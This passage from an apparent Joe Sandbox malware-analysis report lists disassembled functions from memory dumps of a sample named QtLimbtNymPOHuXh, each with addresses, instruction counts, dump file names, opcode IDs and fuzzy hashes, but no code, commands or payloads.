                        • Instruction Fuzzy Hash: 70110531A1891D9FDF90EF98D854AEEB7F1FF58310F000576E409E3295DA74A9508B90
                        Function 00007FFD9BAC5054 Relevance: .0, Instructions: 49COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8b0e11cd873d72ae42c51f1203352cabb32b05c66fbc36ae42d15569f832a2c9
                        • Instruction ID: 6526781b03dc3f622d0611afb241b29964c422842cd22d85c42adfcefa59eb58
                        • Opcode Fuzzy Hash: 8b0e11cd873d72ae42c51f1203352cabb32b05c66fbc36ae42d15569f832a2c9
                        • Instruction Fuzzy Hash: AD119270E1491C8FDBA4EB68D855BECB7B1FF58201F4041AAD40DE32A6DE346D81CB00
                        Function 00007FFD9BACEF4B Relevance: .0, Instructions: 47COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1c2599d3002623b6938894584364d9652ea030b62a943cbd590c0879640241bf
                        • Instruction ID: 3b23c329de094657bbc2a88efca85113ed0bd7b4417dee5c16738f99815da2f7
                        • Opcode Fuzzy Hash: 1c2599d3002623b6938894584364d9652ea030b62a943cbd590c0879640241bf
                        • Instruction Fuzzy Hash: AC016231B1DA4C9FEB94F7A8E4625ECB7A0EF49320F11007AE04DD3293DA2969528740
                        Function 00007FFD9BAC5317 Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: db5c9a3cbb2ffde12230afaf403e117b833dcaa29194c0342035aa5ecc7122d3
                        • Instruction ID: 2113dd16e7de5dc703a43727b1cef5a6ae0519d21f5c2b9618ae4a9531cec9d0
                        • Opcode Fuzzy Hash: db5c9a3cbb2ffde12230afaf403e117b833dcaa29194c0342035aa5ecc7122d3
                        • Instruction Fuzzy Hash: 74017C31E0991D8EDFA4EB6898667FDB3B1FF58200F5000BAD04CE3252CE741A858B01
                        Function 00007FFD9BACBB68 Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6c7c0e660b75b955deeb2f963e73544802ef05c79345c8573ef1d05408a334fc
                        • Instruction ID: 2916b42c2da8743e64461523733079ad1617ffbfe72ca73e7432569080e6e1eb
                        • Opcode Fuzzy Hash: 6c7c0e660b75b955deeb2f963e73544802ef05c79345c8573ef1d05408a334fc
                        • Instruction Fuzzy Hash: E301BC32719A0E8BC768FB28D0505B673A2EF48204B404ABDD04EC75AADA39F8458780
                        Function 00007FFD9BAC621C Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a688fa47bab38e74a6db4f01449807b4175ee3392f998a2b0c6bb2883c7a66e1
                        • Instruction ID: 116db5353ae36f56260bce84b8e4e386f1208f9e72dd10aebbf80a360ade19d4
                        • Opcode Fuzzy Hash: a688fa47bab38e74a6db4f01449807b4175ee3392f998a2b0c6bb2883c7a66e1
                        • Instruction Fuzzy Hash: 96F0C275A18A0D4FEB44EF8CE801AEAB7B5FB99314F00027AF81CC3285DB7569158B94
                        Function 00007FFD9BACF856 Relevance: .0, Instructions: 42COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7cf5ca21780f3597b5ab63ce6ef6cf40683fc2385d24e0127eba2e19df291710
                        • Instruction ID: 2377dac20d651f0aa306b6749ef3e26ec060254cede7e98fbf7839a2d08bb65c
                        • Opcode Fuzzy Hash: 7cf5ca21780f3597b5ab63ce6ef6cf40683fc2385d24e0127eba2e19df291710
                        • Instruction Fuzzy Hash: B0F0A921719D0D4BD664FB68D4615B673D1EF58350B404A7AD04EC75E6DE24B9468380
                        Function 00007FFD9BAD5546 Relevance: .0, Instructions: 42COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 66e7cc9509bc8d1e20e3149580fb59b4a58325f54e661f6ca32d58214d6b0a59
                        • Instruction ID: 245f5ee21e7ec0ed603dc1edafafaedc00f5a3d1f95ccf18a8cac5cda812b190
                        • Opcode Fuzzy Hash: 66e7cc9509bc8d1e20e3149580fb59b4a58325f54e661f6ca32d58214d6b0a59
                        • Instruction Fuzzy Hash: 40F08121B19E0E4BDBB8EB68D4605AA73E1FF98250B414B7DD08EC71F6DE28B9458740
                        Function 00007FFD9BACB9E7 Relevance: .0, Instructions: 41COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ef5cd8b5e49c04742b2d46d93c14eac22f73d3b71f1ee585f1c60b4673a19181
                        • Instruction ID: b3e24400a8f271c2b3feb9060d7e422feeaea90603f1562f375233cc13cef083
                        • Opcode Fuzzy Hash: ef5cd8b5e49c04742b2d46d93c14eac22f73d3b71f1ee585f1c60b4673a19181
                        • Instruction Fuzzy Hash: 7DF0A432305A0E8BD325A75CD8657E53292EBC4320F56457AC459C73A9DD7EE9C28340
                        Function 00007FFD9BAD53D7 Relevance: .0, Instructions: 39COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 624577943b22e9fae147f317d531bf30337a848b515b0360a79b9a398611ee2f
                        • Instruction ID: 2577f5f91a954be4703ce1636113d2e402cb0e695bc65c1845a1c8360d0c97b5
                        • Opcode Fuzzy Hash: 624577943b22e9fae147f317d531bf30337a848b515b0360a79b9a398611ee2f
                        • Instruction Fuzzy Hash: 82F06D3274990E4BE325968CE8617E922E2EBD4320F5A4739C45DC73E5DDADEA828340
                        Function 00007FFD9BACF6E7 Relevance: .0, Instructions: 39COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f20876a96810a43bff51683ecf8e5cdcbf1ae4325c6993df65ebe027ed02e29e
                        • Instruction ID: 9387ca4fc6035b3f53989c9fd5493f31f7fd23e9af1652e1271aa8e0499db00e
                        • Opcode Fuzzy Hash: f20876a96810a43bff51683ecf8e5cdcbf1ae4325c6993df65ebe027ed02e29e
                        • Instruction Fuzzy Hash: C3F0F03270990F4AE325A78CE8617E53292DBD4320F560A39C80DC33E5DEADEA828340
                        Function 00007FFD9BAD29FE Relevance: .0, Instructions: 39COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 95f11a31cd871d10afaa82fc21e167f21637b09b27c15f531524fd939a65f424
                        • Instruction ID: 0bc679c2bd5ea448649d3dfe5ed96c02a5bdd48c33e6eb46ca1b7ce29160205b
                        • Opcode Fuzzy Hash: 95f11a31cd871d10afaa82fc21e167f21637b09b27c15f531524fd939a65f424
                        • Instruction Fuzzy Hash: 58F04F3194F3CA9FD3329BE088615E97F64EF42200B1501F6D089CA0B2C5A96616C752
                        Function 00007FFD9BAC5FA0 Relevance: .0, Instructions: 34COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6f4e3ac1ebfc2e55b442021a2ec9ae075076ab36c0ed3a7e57cd334e142c9fa8
                        • Instruction ID: 176f6f3bdab88b4e9a3aee57aa35c3e8af7b2464e6106b60cf987f85ec488610
                        • Opcode Fuzzy Hash: 6f4e3ac1ebfc2e55b442021a2ec9ae075076ab36c0ed3a7e57cd334e142c9fa8
                        • Instruction Fuzzy Hash: 07F05830A09A0E8BDF60EB98D819AFEBBF0FB45315F01052AE109E3194CB70A1548B81
                        Function 00007FFD9BAC08B1 Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9fbb73cf4dcb7d654f3eca3c8851f0fef2b2963a5894f319c24339a080c9d97f
                        • Instruction ID: 920a703428b3e3c585ab926799eed8bffdf9623d3d15064dcf2ecf1a36d33ecb
                        • Opcode Fuzzy Hash: 9fbb73cf4dcb7d654f3eca3c8851f0fef2b2963a5894f319c24339a080c9d97f
                        • Instruction Fuzzy Hash: 96E0923294F28D4BE7317B608A661F97B20FF42700F8755F6D05C460E3DE9866588346
                        Function 00007FFD9BACD7B5 Relevance: .0, Instructions: 13COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f8c7de4bf8180be551e6ecdeba418e3f984080d0c0659efa2cd64904547a2e9a
                        • Instruction ID: d86c22c481143a3a913d2157d02a30f94992f42cca0dc43de8e3810b9b5e55c7
                        • Opcode Fuzzy Hash: f8c7de4bf8180be551e6ecdeba418e3f984080d0c0659efa2cd64904547a2e9a
                        • Instruction Fuzzy Hash: BDC01200F1E50E9AD9B8B398446417910A16B58300FB54471D06EC71A5CCBDA6011204

                        Executed Functions

                        Function 00007FFD9BAC2010 Relevance: 15.3, Strings: 11, Instructions: 1582COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID: "$[$[$\$]$]$u${${$}$}
                        • API String ID: 0-3490533229
                        • Opcode ID: d2cfa06a9e5984e72ac39b78044c677e418627bfe31f256b3ef3f116b2524c7e
                        • Instruction ID: ade6dbecf2bd31c9d761f926101f787551870d195cc5ebe573891657d827c361
                        • Opcode Fuzzy Hash: d2cfa06a9e5984e72ac39b78044c677e418627bfe31f256b3ef3f116b2524c7e
                        • Instruction Fuzzy Hash: E4E2C570E0962D8FDBA8EF18C895BA9B7B1FF59301F1041E9D01DE7295CA75AA81CF40
                        Function 00007FFD9BACDBBC Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID: 0-3916222277
                        • Opcode ID: ddbf1ec55a539cc4c820e51dc74120238b18b2dcd2a69085c7e069cfb5e28b8c
                        • Instruction ID: 1d10db4913dbc5b3b9dfa1bf7231b31a5f417bb4e40e9f9b86d64377d12201db
                        • Opcode Fuzzy Hash: ddbf1ec55a539cc4c820e51dc74120238b18b2dcd2a69085c7e069cfb5e28b8c
                        • Instruction Fuzzy Hash: 5F218B31E1990D9FDB18EBA8D8659FDB7B1FF98304F0041BAD019E3296DA7569028B40
                        Function 00007FFD9BAD5F8E Relevance: .4, Instructions: 385COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5181011aa9b09d33206701f8e773d600e509483610cbf50e310853893a903ae9
                        • Instruction ID: 33ee489aca16468d39311a4133ce2537264a74e75c9990727a69e98d7710bb01
                        • Opcode Fuzzy Hash: 5181011aa9b09d33206701f8e773d600e509483610cbf50e310853893a903ae9
                        • Instruction Fuzzy Hash: 48B15420B2DA9A0FF32C9B6C88A11B873D0FB85318F65467DD4DBC7597D96CA9438381
                        Function 00007FFD9BAD13A5 Relevance: .3, Instructions: 346COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 19781991a4de8991077ec5d5f7aceb9243fb9eb899436a3f5a043789ec848d58
                        • Instruction ID: 0e275d8c0cd2164074d71720afdd538108d1cdb03dc156aa3b0561d02fca5c7a
                        • Opcode Fuzzy Hash: 19781991a4de8991077ec5d5f7aceb9243fb9eb899436a3f5a043789ec848d58
                        • Instruction Fuzzy Hash: 6CC15370F0A55E4BEBA8FB58C4A17B433A1FFA4344F4541B4D40ED32AADA79AD81CB01
                        Function 00007FFD9BACEB78 Relevance: .3, Instructions: 329COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5522f97cb45f7c4b9bc9339b52fc11d81cbb581e83962929074cf3d0747ebd0f
                        • Instruction ID: f7109ca69bd355593ad0278d34c0054989c0a50e4b6b4e35284eb59e47fc300b
                        • Opcode Fuzzy Hash: 5522f97cb45f7c4b9bc9339b52fc11d81cbb581e83962929074cf3d0747ebd0f
                        • Instruction Fuzzy Hash: 42C17A30E0964D9FDB2DEF98C4A46B8B7B0FF58304F1041BDD05AD76A6DA786A42CB41
                        Function 00007FFD9BAD235F Relevance: .3, Instructions: 295COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f83b0c6967820aa3f7fb94a1dc925afcbedcdcc21ae93dd69fe9036280e9a4ea
                        • Instruction ID: 60d67a521c97225701237dbeee34799ddb74b63a5804fb826ca6ee1ed3ccfd62
                        • Opcode Fuzzy Hash: f83b0c6967820aa3f7fb94a1dc925afcbedcdcc21ae93dd69fe9036280e9a4ea
                        • Instruction Fuzzy Hash: 60210B12F0F38A86F73563E898358F866505FD6321F1A03B7D45D8A0F7DC8C2A81D291
                        Function 00007FFD9BACD7C5 Relevance: .3, Instructions: 277COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 91d4c5ce4e0f816448b8877e5c8d93a3e8b10252366a7fa0dd6f32fcf57e4f22
                        • Instruction ID: 35d203c05bbb255d06fd830431be9ae4b5588f5c29f36bfe271ff34e3220fc14
                        • Opcode Fuzzy Hash: 91d4c5ce4e0f816448b8877e5c8d93a3e8b10252366a7fa0dd6f32fcf57e4f22
                        • Instruction Fuzzy Hash: 60A1A030719A4A4FE768EF5884A0676B7E1EF54300F55497EC0CFC7AA6DAB8F9428740
                        Function 00007FFD9BAC5F71 Relevance: .2, Instructions: 248COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e06d46a86cfe261633d66c738d0c543b37f49a5e88187d73ce35b9cd607af1f0
                        • Instruction ID: 0b3793669b59a60bde6263479f219ea5a8cdcf961b64c24832269d2167c2c14a
                        • Opcode Fuzzy Hash: e06d46a86cfe261633d66c738d0c543b37f49a5e88187d73ce35b9cd607af1f0
                        • Instruction Fuzzy Hash: 18818D30D0A65D8FDB55EFA8D864AEDBBF0FF59310F04017AE049E32A2CA389945CB51
                        Function 00007FFD9BAD4308 Relevance: .2, Instructions: 231COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a7f7497e921bb297f1b1b7a2bd1fcca1da726612cce79568022b6c55206b165b
                        • Instruction ID: 9be431b114a19a91679fe8ecfff813b7c872673b498cf972df20e9889f0704da
                        • Opcode Fuzzy Hash: a7f7497e921bb297f1b1b7a2bd1fcca1da726612cce79568022b6c55206b165b
                        • Instruction Fuzzy Hash: 89819330F1550E8FEB54EB68C464AACB7E2FF99304F100579D059D72AADF39A942CB41
                        Function 00007FFD9BAD1C28 Relevance: .2, Instructions: 218COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b3f8f4808a4b043de22a12323efbf829dfb96250f7c6eb9f9dd75b5c79749d86
                        • Instruction ID: fd2ed7808d2b8b816fbbe085bb631bdacf3302408071c99872eb20473a19da94
                        • Opcode Fuzzy Hash: b3f8f4808a4b043de22a12323efbf829dfb96250f7c6eb9f9dd75b5c79749d86
                        • Instruction Fuzzy Hash: 9B618A30B1EB464FD32D9B6C94650B437E0EF9931471547BED08FCB293EE18A9468781
                        Function 00007FFD9BAC5FA0 Relevance: .2, Instructions: 194COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 73e62b62f6b02f7c6385c4c837d22185730b4160929b085f0fe431dcb3a8f51c
                        • Instruction ID: eb20564fde76d8eca44328b6d7ad04e52ada06356cf751ac84bf455d6e0bae64
                        • Opcode Fuzzy Hash: 73e62b62f6b02f7c6385c4c837d22185730b4160929b085f0fe431dcb3a8f51c
                        • Instruction Fuzzy Hash: 0D516930E09A5D9FDB90EFA8D854AEDBBF0FF59311F00026AE009E3295DB34A945CB41
                        Function 00007FFD9BACFE8D Relevance: .2, Instructions: 188COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 38d5aaf8e6abf8988e589df69c425e1e9a26078e04571bb4b30072b133a8920f
                        • Instruction ID: ae03ff2cd9192b0586ce59b158f03d2a91c0112f7ae1a4255e9a94b32db9ce7c
                        • Opcode Fuzzy Hash: 38d5aaf8e6abf8988e589df69c425e1e9a26078e04571bb4b30072b133a8920f
                        • Instruction Fuzzy Hash: 4A61E530B1AB0A4FE365EB68C5A467577E1FF84300B51497DC08EC3AAACB79B946C740
                        Function 00007FFD9BACC758 Relevance: .2, Instructions: 179COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a165930f01905c4ebed0eb96a1c46fbe5ad0600d86bb5cb026449324b9f515b3
                        • Instruction ID: 32c66f73d506d45f1758cc4ce79b3c09789b1db0ec91ef22159918d029bfb712
                        • Opcode Fuzzy Hash: a165930f01905c4ebed0eb96a1c46fbe5ad0600d86bb5cb026449324b9f515b3
                        • Instruction Fuzzy Hash: 1A516C31B0EA0A4BE738AB6894651B677E0EF45320F06027ED05EC7593EF6DB94287D1
                        Function 00007FFD9BACF42D Relevance: .2, Instructions: 175COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0edef26c72a7a4a0987e1932508e15c9d70d88ad46b6453574d13117f468ba42
                        • Instruction ID: cdea1a9c9503e11b9b7114d2e7794021c479aa6b71117998214f912fd69d589f
                        • Opcode Fuzzy Hash: 0edef26c72a7a4a0987e1932508e15c9d70d88ad46b6453574d13117f468ba42
                        • Instruction Fuzzy Hash: 4661B63061AB0A8FE368EF64C1A45B177E2FF54304B50497DC04AC7AA6DB7AF946CB00
                        Function 00007FFD9BAD0741 Relevance: .2, Instructions: 157COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 38ff1aac812b7dabc1061cb82c9568844fd1bcc37eb6b614962dfa859e5d1523
                        • Instruction ID: bfb8692cbbc63a0d9d472515976ae03a66b33785da6e4cdb89ec7f38fb669610
                        • Opcode Fuzzy Hash: 38ff1aac812b7dabc1061cb82c9568844fd1bcc37eb6b614962dfa859e5d1523
                        • Instruction Fuzzy Hash: D1517F34A08A5C8FDB58EF98D864AEDB7F1FF59304F14026AE00DD7295CB75A851CB41
                        Function 00007FFD9BAC9807 Relevance: .1, Instructions: 144COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6e452ac0d7025916865d793830b03a99e1d626465364a73bc07e75cd6130ee9d
                        • Instruction ID: f3334b228ab520c92c862422e050c2efc98273c0eb2b755e9724f900b6d541a3
                        • Opcode Fuzzy Hash: 6e452ac0d7025916865d793830b03a99e1d626465364a73bc07e75cd6130ee9d
                        • Instruction Fuzzy Hash: C541EF31D0985D8BDB64EF98D8A0AF9B7B4FB55340F01217AD02DE31A1DB75AA81CB48
                        Function 00007FFD9BAC0FDA Relevance: .1, Instructions: 137COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 60d4aeb4e53f85511545d65a8bb40ac8e91d9772d19fd10735ae2af9bbc4b323
                        • Instruction ID: 21ed97b71bc7bd33708334f5664fbd4f46dbb8237d2987520c3fc7492472b261
                        • Opcode Fuzzy Hash: 60d4aeb4e53f85511545d65a8bb40ac8e91d9772d19fd10735ae2af9bbc4b323
                        • Instruction Fuzzy Hash: E6413D70E1965DCFDB94EFA8C4A4AACBBF1FF59305F100169E009E72A5CB38A941CB40
                        Function 00007FFD9BAC4EF9 Relevance: .1, Instructions: 126COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
